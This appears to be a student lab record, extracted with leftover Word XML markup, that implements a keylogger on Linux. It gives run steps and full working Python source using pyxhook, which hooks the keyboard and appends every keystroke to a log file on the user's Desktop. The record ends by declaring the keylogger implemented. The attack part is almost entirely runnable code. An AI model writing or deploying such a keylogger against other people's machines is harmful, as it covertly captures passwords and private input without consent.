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16/03/2024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KEYLOGGERS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implement Keyloggers to implement Key Strokes in Linux.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Check if python.xlib is installed.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Run pxyhook file using the command-python pyxhook.py.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the file key.py.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Run key.py to record all Key Strokes.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Open file.log file to view all the recorded Key Strokes.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#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Keylogger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Python code for keylogger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to be used in linux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import os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import pyxhook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This tells the keylogger where the log file will go.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You can set the file path as an environment variable ('pylogger_file'),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or use the default ~/Desktop/file.log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log_file = os.environ.get(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'pylogger_file',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os.path.expanduser('~/Desktop/file.log')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Allow setting the cancel key from environment args, Default: `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cancel_key = ord(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os.environ.get(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'pylogger_cancel',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'`'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)[0]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Allow clearing the log file on start, if pylogger_clean is defined.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if os.environ.get('pylogger_clean', None) is not None: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try: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os.remove(log_file)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except EnvironmentError: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 # File does not exist, or no permissions.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pass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#creating key pressing event and saving it into log file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def OnKeyPress(event):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with open(log_file, 'a') as f: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f.write('{}\n'.format(event.Key))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create a hook manager object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new_hook = pyxhook.HookManager()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new_hook.KeyDown = OnKeyPress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set the hook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new_hook.HookKeyboard()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try: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new_hook.start()         # start the hook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except KeyboardInterrupt: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# User cancelled from command line.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pass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except Exception as ex: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# Write exceptions to the log file, for analysis later.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msg = 'Error while catching events:\n  {}'.format(ex)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pyxhook.print_err(msg)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with open(log_file, 'a') as f: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f.write('\n{}'.format(msg))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Output:</w:t>
      </w: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>
            <wp:extent cx="5731510" cy="5591810"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8890"/>
            <wp:docPr id="704126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6940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Hence,Keylogger has been implemented successfully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F9D49"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="58CF9D4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33"/>
    <w:rsid w:val="00041AD1"/>
    <w:rsid w:val="001C65E2"/>
    <w:rsid w:val="003E4833"/>
    <w:rsid w:val="00463FFD"/>
    <w:rsid w:val="006B4B54"/>
    <w:rsid w:val="007042F5"/>
    <w:rsid w:val="0082629C"/>
    <w:rsid w:val="00CA6B1E"/>
    <w:rsid w:val="00D84F11"/>
    <w:rsid w:val="26922526"/>
    <w:rsid w:val="55A438A2"/>
    <w:rsid w:val="62252435"/>
    <w:rsid w:val="6DCE2536"/>
    <w:rsid w:val="7BD1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1231</Characters>
  <Lines>10</Lines>
  <Paragraphs>2</Paragraphs>
  <TotalTime>4</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>1444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2024-05-08T07:56:00Z</dcterms:created>
  <dc:creator>Jeffrey Jesu</dc:creator>
  <cp:lastModifiedBy>Kavin Manoharan</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-05-18T12:34:36Z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6E19D54912864132934144BAD24FC389_13</vt:lpwstr>
  </property>
</Properties>
</file>